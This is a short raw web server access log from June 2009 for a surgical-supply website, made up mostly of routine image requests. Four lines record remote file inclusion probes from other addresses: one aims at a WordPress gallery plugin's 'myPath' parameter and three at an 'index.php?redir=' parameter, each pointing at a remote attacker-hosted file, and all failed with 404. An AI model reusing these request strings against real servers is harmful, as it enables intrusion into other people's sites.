124.186.84.66 - - [04/Jun/2009:01:27:35 -0400] "GET /images/cat_link.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0017A64214729800E0DE041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:27:35 -0400] "GET /images/cat_expand.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0017A64214729800E0DE041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:27:49 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0017A64214729800E0DE041+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:27:50 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:27:51 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:27:55 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
124.186.84.66 - - [04/Jun/2009:01:27:55 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
85.17.162.28 - - [04/Jun/2009:01:28:27 -0400] "GET /logs/access_log.Q109052200%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
70.38.54.140 - - [04/Jun/2009:01:28:56 -0400] "GET /logs/access_log.Q109051000/index.php?redir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
70.38.54.140 - - [04/Jun/2009:01:28:56 -0400] "GET /logs/access_log.Q109052900/index.php?redir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
70.38.54.140 - - [04/Jun/2009:01:29:48 -0400] "GET /logs/access_log.Q109052700/index.php?redir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
77.166.79.119 - - [04/Jun/2009:01:29:54 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Avant Browser)"
77.166.79.119 - - [04/Jun/2009:01:29:54 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Avant Browser)"
